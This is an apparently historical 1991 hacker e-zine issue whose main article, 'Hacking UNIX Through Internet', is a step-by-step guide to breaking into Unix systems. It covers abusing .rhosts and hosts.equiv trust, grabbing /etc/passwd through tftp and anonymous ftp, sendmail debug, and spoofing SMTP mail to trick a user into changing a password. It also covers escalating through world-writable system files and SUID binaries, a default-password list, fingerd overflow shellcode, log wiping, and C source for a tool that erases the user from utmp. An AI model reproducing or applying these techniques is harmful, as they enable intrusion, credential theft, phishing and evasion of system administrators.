============================================================================== Volume 2, Issue 01 ---------------------------------- Thursday August 29, 1991 ============================================================================== Legions of Lucifer - Phone Hackers United to Crash & Kill < LoL-Phuck > LoL-Phuck, Inc. / Issue Number 2.01 08.29.1991 (C)Copr 1990,91 Cypher Productions - All rights reserved. ============================================================================== Legions of Lucifer founded on January 20, 1990 by: Digitone Cypher PHUCK, INC. Founded in 1986 by: Tripin Face (aka Cobra Commander) ------------------------------------------------------------------------------ Legions of Lucifer merged with PHUCK, INC on January 15, 1991 at 11:41pm PST! (That is the same day the Persian Gulf War started [Operation Desert Storm]) We are now: LoL-Phuck ------------------------------------------------------------------------------ Note: Any and all information found in this production is not to be used or intended to be released to due any harm to anyone. This is mearly for 100% informational purposes only and neither writers, staff members, submitters nor anyone else that has anything to do with this released issue should be held resonsible for the deeds and misgivings that intentional may readers preform. ------------------------------------------------------------------------------ All text file submissions should go to: West Coast Technologies, Inc. @ +1-213-274-1333 (Use the guest account; User Name: GUEST Password: GUEST) ------------------------------------------------------------------------------ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ------------------------------------------------------------------------------ EDITORS/PRESIDENTS NOTE: Okay basically, I am proud to say that LoL-Phuck is back from the "DEAD" to bring you finally good quality reading material. I am going to tell you guys right now, that we will not be producing that many text files, we will just release when we feel like it, and not on a monthly kind of basis. We are infact looking for writers, so if you do want to apply, you can find it in this text file where to. This certain file, is a joint release between SHA (a Swedish Hacking Group) and LoL-Phuck, so I hope you all like it... I would also, like to note that starting from this text file, LoL-Phuck will be totally different, this is the NEW and very IMPROVED Legions of Lucifer-Phuck. Watch for the hot text files and releases we will be producing in the months to come.. Starting on November 2, 1991 "West Coast Technologies, Inc" will be changing area codes from 213 to 310. There will be a 6-Month period from November 2, 1991 to May 2, 1992, when both the new and the old ways of completing the calls to this number (274-1333) will work. Beginning May 2, 1992, calls dialed to the incorrect area code (213) will not be completed. You will reach a recording explaining the new dialing procedures and you will need to re-dial using the correct area code (310). ...Also, as you all know by now, there is a text file called "LOL-21.TXT" which was supposedly written by me, that is like a "Sexual Biography", I am going to state for the record that I *DID NOT* write that trash. Now, The next official issue will be "LOL-022.TXT" since #21 has been taken by the bogus text file, and we wouldn't want them to get confused now would we? This kinda of thing has happened before, I believe it was Issue #9, some jokers did the same prank, so I know how to handle it. Anyways, I would like to thank the rest of you for all your support. Digitone Cypher LoL-Phuck President 08-29-91 I may be contacted at the following internet addresses: UUCP: {hplabs!hp-sdd ucsd nosc}!crash!pnet01!dcypher ARPA: crash!pnet01!dcypher@nosc.mil INET: dcypher@pnet01.cts.com ############################################################################## ----------------------[ Hacking UNIX Through Internet! ]---------------------- ############################################################################## Written by: Mr Big Release Date: Thursday August 29, 1991 Editied by: Digitone Cypher Release Numb: 20th Issue ------------------------------------------------------------------------------ This file is released in a joint venture with Swedish Hackers Association in Sweden. Note: S.H.A. are not members of LoL-Phuck, nor are LoL-Phuck members of S.H.A., both groups are separate to each other, this is a only a exchange in knowledge and assistance. Legions of Lucifer-Phuck is always looking for submissions of text files from small groups and from solo writers for worldwide distribution. We are also look for Distribution Sites and full/half-time writers. I can be contacted at the LoL-Phuck HQ @ 213/274+1333... thank you. ---------------- - Introduction - ---------------- I decided to write this file since I feel that there are no complete files about hacking unix systems. Many files only cover some small part in the art of hacking unix, and they don't cover hacking through Internet where aprox. 80% of all hacking takes place. I will not state that this file isn't complete either, since I have, on purpose, left out many things, i.e. bugs in programs that might be exploited, as the Internet Worm did. The reason I did this is because they will not be up-to-date for very long, even though some sites don't install all patches that are released. A good source for all these bugs are comp.unix.wizard, comp.unix.source and other newsgroups. This file isn't supposed to be for the beginner, so not everything in this file is explained in detail. YOU should have common knowledge of unix and Internet. /Mr Big - S.H.A. ---------------------------[ Internet Section ]----------------------------- ------------ - Internet - ------------ In the beginning a US Goverment network existed nationwide. When it grew larger the network where split into two networks, one research- (Arpanet) and one millitary network (Milnet). Later thousands of other networks worldwide where also connected and then Internet was born. Internet is a good way of hacking unix systems. There are more than ten thousand computer systems connected to Internet worldwide, running diffrent OS's, but Unix's are the major one used. You are also able to reach other networks or domains through Internet as ARPA network, NASA or the NSA network among others since they are part of the Internet. Approxitly 80% of all hacking take part on Internet. So be aware of that goverment agencies are watching known hacking sites and other sources for hackers. There are also many outdials connected to Internet worldwide that can be used for free calls, but this file isn't about that. Maybe I will compile my list of outdials some day and release it, but that is in the future. How do I get connected to Internet? Well, find you local dialup or go through some University, since most of them are connected to Internet. You can use the MIT Dialup if you don't have anything else: MIT LCS Network Dialup (617) 258-7111 (I'm sorry that I can't supply you with a whole list of dialups, but since I'm from Sweden, I don't have the needs for US Dialups.) WARNING: Even if Internet seems to be untraceable, they can easily find out where you are hacking from. It's a bit harder if you use gateways before hacking, and don't use your own account unless you want to be in deep shit! ------- - IRC - ------- Internet Relay Chat or IRC for short, is a worldwide multi-chat system where users can exchange and discuss stuff real-time with the rest of the world. IRC has many channels you can use - both public, private and hidden. There are many users using this and you can easily get help and information this way, since many people out there knows what they are doing. Be aware that goverment agencies, like NCSA, might be tapping the public forums and users using them, atleast I would... Use this IRC server if you don't have anything else: bradenville.andrew.cmu.edu (128.2.54.2) ------------ - Outdials - ------------ There are also outdials on Internet that you can use. I will not include a list of those, since I know if they are abused, they will go down. You have to do your own search for them. ---------- - Telnet - ---------- Telnet is more or less equal to Internet. With Telnet you can access other systems on the Internet by entering the IP number or the same address of the computer. This is the most common way of connecting to other systems, even if there are other ways too... i.e. rlogin among others... #telnet [HOST] [PORT] Where HOST is the IP address or the name of the computer, and PORT is the port to connect to at the remote site. The port number range from 0-9999. Ports 0-255 are standard ports and well defined in unix. Ports 256-1023 are well known ports. Ports 1024-4999 are user defined ports. Ports from 5000 and upward are nondefined ports. Here are a small list of common port numbers and what they do: 21 FTP _ File Transfer Protocoll 25 SMTP - Or Simple Mail Transfer Protocol. 79 Finger - Reports information of users on remote system. ------- - Ftp - ------- File Transfer Protocol or FTP for short is a powerful way to send and receive files between Internet connected hosts. Many sites have set up their systems for anonymous ftp. They have done this since they want everyone to be able to get files and information without having a password. You should respect the ftp hours that are common, i.e. do NOT ftp at local business times, since these systems are used in companys, and work most of the time, and if you use ftp during these hours, they might close the opportunity for us to use ftp, and I would hate it if that happend. #ftp [HOST] Where HOST are the IP address or the name of the computer. ---------- - Usenet - ---------- Some people say that Usenet is the world larges BBS around, and in some sense they are right. Usenet consists of over 1000 forums for various topics, with hundreds of thosands of users worldwide using it. Many good forums for Unix information exists, i.e. misc.security comp.unix.vizard comp.unix.source comp.security.announce alt.security To use Usenet news just type: #rn <- This command might vary from system to system. -------- - CERT - -------- CERT or Computer Emergency Respons Team is an organization which main purpose are to help and prevent unautorized access to computer systems. They publish bug fixes for security holes in diffrent OS's, mainly in comp.security.announce. They also have their own site and support for anonymous ftp so you can directly ftp bug fixes from them or tools that helps system administrators to check the security on their own systems. One good system administration tool for checking the security on your own system are COPS, even if it dosen't detect all bugs that exists. System Managers: If you think you have a compromised system, I suggest that you contact CERT for assistance. The Internet address for CERT is: cert.sei.cmu.edu (128.237.253.5) ------------------------------[ Unix Section ]------------------------------- -------------------- - Attacking target - -------------------- Well... first we need an account on a remote system.. How do we get it? There are no easy ways for this, unless your system is trusted. It isn't easy even if your system is trusted, but it is easier :-) - .rhosts - Check out your own and other users .rhosts files. These files contains those machines and users that are trusted to log into the account, in which home group it resist, without any password. Note: You must use rlogin to use this feature. #cat .rhosts albert guest gnu.ai.mit.edu + # The plus (+) sign indicates that all users on gnu.ai.mit.edu are trusted to use this account without a password, and hopefully this user can log in on the same account on gnu.ai.mit.edu whithout a password. Note: You can set "+ +" to allow anyone anywhere to use the account, but be aware of that if the user dosen't have to enter his own password, he WILL contact the system administrators at his site. To scan all users .rhosts files use the following: #find / -name .rhosts -exec /bin/cat {} ";" If you stumble in on an account, then I suggest you add one entry to the .rhosts file to include the hostaddress of a system that allows guest users, and a plus sign (+). By doing this you don't have to create a shell with suid that can be discovered and you don't even have to hack another account to use the one you stumbled on. Remeber that the user or root must own the .rhosts file on many newer systems, i.e. Sun OS 4.x. - /etc/hosts.equiv - /etc/hosts.equiv contains system wide trusted remote sites. #cat /etc/hosts.equiv albert +@gnu.ai.mit.edu + # If /etc/hosts.equiv contains a plus sign (+) then all hosts are trusted. Many Sun system are deliverd with /etc/hosts.equiv set up this way. - finger - You can also always try to get some accounts on a remote site by using "finger @remotesite" and then guessing passwords... You can even try "finger user@remotesite", where user is a possible user on the remote site, i.e. guest to see if they have a guest account. - tftp - Some systems running tftp - Trivial FTP, have a bug allowing you to copy files that contain slashes, normaly tftp impose the security that the file must be world readable, but since /etc/passwd are world readable, try this: #tftp remotesite tftp> get /etc/passwd <- Try snatching /etc/passwd Recieved 30216 bytes in 32 seconds. tftp> quit # Note: Even if you are not physicaly are logged in at the remote host, this action is stored in the log files on the remote system. - ftp - Some systems running anonymous ftp and are not correctly setup might allow any user to move above their restricted (root) directory, and then access all files on the system. #ftp remotesite Connected to remotesite. 220 remotesite FTP server (Version 5.59 Mon Oct 29 15:33:08 EET 1990) ready. Name (remotesite:root): anonymous <- Login as anonymous 331 Guest login ok, send your login name as password. Password: <- Anything is ok 230- Guest login ok, access restrictions apply. ftp> cdup <- The magic one! 250 CWD command successful. ftp> get /etc/passwd /dev/tty <- Retreive /etc/passwd 200 PORT command successful. 150 Opening ASCII mode data connection for passwd (56 bytes). root:sEQ5aTPgP4bSc:0:0:Super-User:/:/bin/sh +::0:0::: 226 Transfer complete. local: /dev/tty remote: passwd 56 bytes received in 7e-06 seconds (1.1e+04 Kbytes/s) ftp> quit 221 Goodbye. # - sendmail - The Internet Worm exploited a debug mode in the original sendmail to coax sendmail into creating and executing a program that copied the rest of the Internet worm over to the target host. Note: Almost every system have been patched against this. #telnet remotesite 25 Escape character is '^]'. 220 s350. Sendmail 4-0/SMI-4-0 ready at Wed, 10 Jan 91 15:35:01 debug <- Try debug command 200 Debug set quit Connection closed by foreign host # - smtp - By connection to the smtp daemon on the remote site, you are able to send mail under any user identity, to any user on any system. If we want to try to fool a user on a system to change his password, (not likely he will be fooled), but we can easily do this, i.e. We want to send mail from root@tycho.ncsc.mil to john@gnu.mit.edu #telnet tycho.ncsc.mil 25 Connected to tycho.ncsc.mil. Escape character is '^]'. 220 tycho.ncsc.mil. Sendmail 4-0/SMI-4-0 ready at Wed, 10 Jan 91 15:35:01 rcpt to: john@gnu.mit.edu <- Receiving user 250 john... Recipient ok mail from: root@tycho.ncsc.mil <- Fake user 250 example... Sender ok data <- Instruct SMTP to receive data 354 Enter mail, end with "." on a line by itself We are testing new equipment and you are instructed to change your password to john as soon as you receive this message. root@tycho.ncsc.mil . <- End mail 250 Mail accepted quit <- Now disconnect from system Connection closed. # ------------------- - Raise you privs - ------------------- Many users talk about getting root access... It's nice but not necessary to have. The Internet worm didn't exploit root privs if it had it and it managed to hit many remote sites anyway. If you need root or not depends on what you want to do with the system. - System files - Check out if you have read/write access to the following files: #ls -l /dev/mem crwxrw-rw- root /dev/mem <- General physical memory #strings - /dev/mem <- Use this to get strings from memory to use #ls -l /dev/kmem crwxrw-rw- root /dev/kmem <- Kernal memory Kernal memory contains among other things.. psid table - Process ID table. I will not support any C program allowing changes to pid's in kernal memory since if someone doesn't know how to use it, then the whole system will crash! and we don't support that kind of action. #ls -l /etc/inittab <- Sys V startup file #ls -l /etc/rc* <- BSD startup file -rw-rw-rw- root /etc/inittab -rw-rw-rw- root /etc/rc <- Standard unix commands -rw-rw-rw- root /etc/rc.host <- running with root privs -rw-rw-rw- root /etc/rc.local <- #ex /etc/rc #ls -l /etc/inetd.conf <- Sys V demon configuration file #ls -l /usr/etc/inetd.conf <- BSD demon configuration file -rw-rw-rw- root /etc/inetd.conf <- After editing use #kill -1 initd -rw-rw-rw- root /usr/etc/inetd.conf <- After editing use #kill -1 initd #ls -l /etc/utmp <- Contains only who information -rw-rw-rw- root /etc/utmp <- Used to hide your session or to change your usernamne Check out the included source (hide.c) that does this. You can even read other users mail. #ls -l /usr/spool/cron/crontabs <- Sys V cron shell scripts #ls -l /usr/spool/cron <- Older unix systems -rw-rw-rw- root /usr/spool/cron/crontabs -rw-rw-rw- root /etc/spool/cron Check also local written system scripts that runs as root and other important system files. - System directorys - Check to see if you have write privs to any important system directory. i.e. /etc /bin /usr/etc /usr/bin /usr/lib ... To find writeable directories use: #find / -type d -perm -2 -print If you have write priv's to a directory but not to a file in the directory you can still copy the file over to another directory, modify it and copy it back. #cp /home/admin/.rhosts /home/mydir/newrhosts #ex /home/mydir/newrhosts #rm /home/admin/.rhosts #mv /home/mydir/newrhosts /home/admin/.rhosts or #cat /bin/sh > /home/admin/shell To find writeable files use: #find / -type f -perm -2 -file {} ";" Try modifying startup files for users, i.e. .login .cshrc .profile ... Note: The System Administrators might check to see if these files have been changed and then they check them to see if there was a backdoor installed or not. - UID files - I neat way of gaining better access is to search for files that have the UID bit set and then if they are writeable, copy /bin/sh over to the file to gain the privileges of the owner of the file. #find / -perm -4000 -exec /bin/ls -lad {} ";" - mbox - Reading other peoples mailboxs might give you a clue to their password. They might even have posted it to a friend on the system. Note: Reading other peoples electronic mail is a serious crime. #find / -name mbox -exec /bin/cat {} ";" - fingerd - The Internet worm exploitet a bug in the old fingerd program. The program used an obsolete C function called gets(). gets() copies input into a string, but doesn't count the number of characters copied. The old fingerd declaired a 512-byte buffer as an automatic variable, which placed this buffer on the stack. The Internet worm sent down 536 characters, overflowing the buffer, adding some code, and modified the return address, so that fingerd executed a Bourne shell instead of returning. This flaw was used only for VAX running BSD unix. VAX assembly-language code used: nop 400 nop's ... pushl $68732f store '/sh[null]' on stack pushl $6e69622f store '/bin' on stack movl sp,r10 save stack pointer in r10 pushl $0 store 0 on stack (arg 3) pushl $0 store 0 on stack (arg 2) pushl r10 store string adress on stack (arg 1) pushl $3 store argument count on stack movl sp,ap set argument pointer to stack chmk $3b system call to execve ----------------------- - Brute force hacking - ------------------------ You can allways get a copy of /etc/passwd and then run it with a unix matcher guessing passwords. There are many programs around, so I think I'm wasting my time if I include one. This is the standard way of getting other accounts.. but it's hard to match root account password. If you wan't root access you have to use some other technique, but if you are satisfied with some user accounts, this is the best way. Be adviced that many new systems have passwords from 6-8 characters with a minimum of one non-alphabetical character, or they are running C2 standard with shadow /etc/passwd, i.e. you can only see account names in /etc/passwd and not the encrypted password, i.e. #cat /etc/passwd <- Featuring C2 standard root:*:0:0:Super-User:/:/bin/sh <- You can see that they guest:*:3169:30:Guest User:/home/guest:/bin/rsh <- Have shadowing passwd +::0:0::: file since the password field contains '*'. You can always try to get accounts without password: #grep :: /etc/passwd Note: Many system administrators will have their eyes open for users who use A LOT of cpu time... so I suggest that you get yourself a password cracker for your own computer at home, and run your matching sessions there, even if it's slower. ---------- - Hiding - ---------- Since hacking is illegal you might want to hide from the System Manager at the site you are attacking. Please note that they often pay special attention to users using a big per cent of the cpu time (like when matching passwords). Also try to keep the number of files in your directory low, or atleast try to only store smaller files, anything to not draw attention to you. Change users frequently so if the system managers notice you they hopefully do not get any evidence against you. Check system files to see if they have been patch audit your access to them. - /etc/utmp - If you have write permissions to /etc/utmp you can easily remove yourself to show up on "who" listings, or even change your username. Check out the included C source for this, Hide.c. You can also read other users mail if you can alter /etc/utmp. - getty - Try running /etc/getty or /usr/etc/getty and login again. With this way you will hide from where you are calling from, i.e. your host address won't show up on "who" listnings. - running programs - If you use any program that you shouldn't i.e. running passsword matching programs, then I suggest that you first rename the program to some appropiate, i.e. #mv matcher emacs #mv passwd user #mv password magazine Then use the program: #emacs user magazine Or you simply change your source code to always use one file as the passwd file and another one for the dictionary. - /usr/spool/mail/ - There are times when you should edit users mail. If you are editing a file and then kill the process, it will post mail to your user stating that the process was aborted and that you can recover your file with a command. If the real user sees this, he might talk to the system administrators about it, and then they will start to investigate the account without your knowledge, and some day.... shit happends! - /etc/wtmp - If you have root access you might want to remove your trails from the system log file, /etc/wtmp, so they won't notice that you are fooling around with their system. ---------- - Modems - ---------- Many people hack just to lower their phonebills. Many unix systems has outgoing modem lines. You can use them if you have the right privileges. Try using the command cu - Call Unix: #cu 3143818460 <- Yeah! This number works... --------------------- - Standard accounts - --------------------- There are many standard accounts you can try hacking and some common too. Even if the system administrators are more aware of these holes, they still exists, and may be worth trying. Use the included list of standard and successful accounts. Login: Password: Login: Password: adm adm admin admin altos altos batch batch bin bin daemon daemon date date demo demo field service games games general general guest guest help help ingres ingres learn learn lp lp lpadmin lpadmin nuucp nuucp pub pub public public rje rje root root standard standard student student sync sync sys sys sysadm sysadm test test time time tty tty unix unix user user uucp uucp uuhost uuhost who who ------------------- - Finding targets - ------------------- This is the hard part if you don't know so much about Internet. I will not go further into this, because if everyone starts to use the techniques I have, it will be abused and then we might not have many systems that will be reachable through Internet. And we don't want that to happen, so you have to figure this out for yourself. If this sounds a bit on the selfish side, I truely regret it, but its for your own good. --------------------- - Crashing a system - --------------------- If you do crash a system on purpose, I hope you get caught and that you have to rot in prison for a long long time... Even if you stumble in on a root account and think that they are lamers who are in charge of the system, you NEVER trash the system on purpose! Never crash a system on purpose! Never delete files that you haven't created! Never remove personal mail to people on the system! ----------------------- - Voice of the Author - ----------------------- I have been working with this for some time now. Even if I don't really feel that this is complete, I have desided to release it as it is, (then I can write a follow up to this... ), and hopefully you will enjoy it anyway. I will release some Internet/Unix hacking utilities in the near future, including backdoors and other nice programs you might need. If you need to contact me or S.H.A. you can send mail to me on the following networks: FidoNet : 2:201/610 username mrbig Internet : mrbig@DARKSIDE.COM ############################################################################# SOURCE CODE SOURCE CODE SOURCE CODE SOURCE CODE SOURCE CODE ############################################################################# -------- - Hide - -------- Speacial thanx to Nimh of Stealth Hackers who wrote this program and for letting me include it in this release. Thanx! Hide will let you remove yourself from /etc/utmp or change the information for you in /etc/utmp, i.e. username, host address or tty. Note: /etc/utmp must be writeable by world. <----CUT HERE-------CUT HERE-------CUT HERE-------CUT HERE------CUT HERE----> #include #include #include #include #define UTMPFILE "/etc/utmp" FILE *utmpfile; char *utmp_tmp[10240]; main (argc, argv) int argc; char *argv[]; { struct utmp *user_slot; struct passwd *pwd; char line[10], name[10], host[20]; int index; printf ("Welcome to HIDE ! FORMAT: hide [-i]\n\n"); utmpfile = fopen (UTMPFILE, "r+"); if (utmpfile == NULL) { printf ("ERROR while opening utmp file... exiting...\n"); exit (); } index = ttyslot(); /* Get this users utmp index */ index *= sizeof(struct utmp); /* 36 */ fseek(utmpfile, index, 0); /**** Get real UID ****/ pwd = getpwuid (getuid()); if (pwd == NULL) printf ("Who the hell are you???"); else { printf ("Real user identity:\n"); printf ("NAME %s\n", pwd->pw_name); printf (" UID %d\n", pwd->pw_uid); printf (" GID %d\n\n", pwd->pw_gid); } /**** If ARG1 = "-i" then disappear from utmp ****/ if ( (argc>1) && (!strcmp(argv[1], "-i")) ) { index+=8; /* Rel PNT name */ fseek(utmpfile, index, 0); fwrite ("\000", 8, 1, utmpfile); /* NO NAME */ fwrite ("\000", 8, 1, utmpfile); /* NO HOST */ fclose(utmpfile); printf ("Removed from utmp\n"); exit(); } /**** Change utmp data ****/ printf ("Enter new data or return for default:\n"); fseek(utmpfile, index, 0); /* Reset file PNT */ fread(line, 8, 1, utmpfile); line[8]=NULL; fread(name, 8, 1, utmpfile); name[8]=NULL; fread(host, 16, 1, utmpfile); host[16]=NULL; fseek(utmpfile, index, 0); /* Reset file PNT */ dinput (" TTY [%s]%s", line, 8); dinput ("NAME [%s]%s", name, 8); dinput ("HOST [%s]%s", host, 16); fclose(utmpfile); } /* Data input */ dinput (prompt, string, size) char *prompt; char *string; int size; { char input[80]; char *stat; char space[] = " "; space[20-strlen(string)] = '\000'; printf (prompt, string, space); stat = gets (input); if (strlen(input) > 0) fwrite (input, size, 1, utmpfile); else fseek (utmpfile, size, 1); } <----CUT HERE-------CUT HERE-------CUT HERE-------CUT HERE------CUT HERE----> ============================================================================== ############################################################################## ## ####### ## ###### ## ## ## ## ###### ## ## ## ## ## ## #### ## ## ####### ## ## ## ## ## ## ## ## ## ###### ## ## ## ## ## ##### ###### ####### ####### ## ## ## ####### ####### ## ## ############################################################################## ------------------------------------------------------------------------------ (L)egions (o) (L)ucifer - (P)hone (H)ackers (U)nited (C)rash (K)ill ------------------------------------------------------------------------------ Call these LoL-Phuck support boards for information or application inquiries: UNITED STATES: The Disconnected System 602/997+9918 Arizona NSA Dist Site West Coast Technologies, Inc. 213/274+1333 California AfterShock Beta The Magical Mystery Board 203/TMP+DOWN Connecticut THG Dist Site Blitzkrieg BBS 502/499+8933 Kentucky TAP Magazine HQ Blitzkrieg BBS 502/491+5198 Kentucky TAP Magazine HQ Free Speech BBS 618/457+3365 Illinois PHRACK Classic HQ Gonzo's Gabanza 513/890+0655 Ohio CHUD Dite Site EUROPE/OUTSIDE CONTINENTAL NORTH AMERICA: Interpol II +46-8-PR-IVAT Sweden SHA HQ ============================================================================== Legions of Lucifer-Phuck High Office Staff Member Prezident of [L.o.L] : Digitone Cypher Prezident of [Phuck] : Tripin Face (aka Cobra Commander) Out of US Representatives : Mr Big -=- Sweden ============================================================================== Legions of Lucifer - Phone Hackers United to Crash & Kill < LoL-Phuck > LoL-Phuck, Inc. / Issue Number 2.01 08.29.1991 Complete (C)Copr 1990,91 Cypher Productions - All rights reserved. ------------------------------------------------------------------------------ All text file submissions should go to: West Coast Technologies, Inc. @ +1-213-274-1333 (Use the guest account; User Name: GUEST Password: GUEST) ------------------------------------------------------------------------------ ______________________________________________________________________________ ============================================================================== ============================================================================== - Digitone Cypher (Main Editor/Layout/President) ============================================================================== 456835454/021491-0202 Downloaded From P-80 International Information Systems 304-744-2253 12yrs+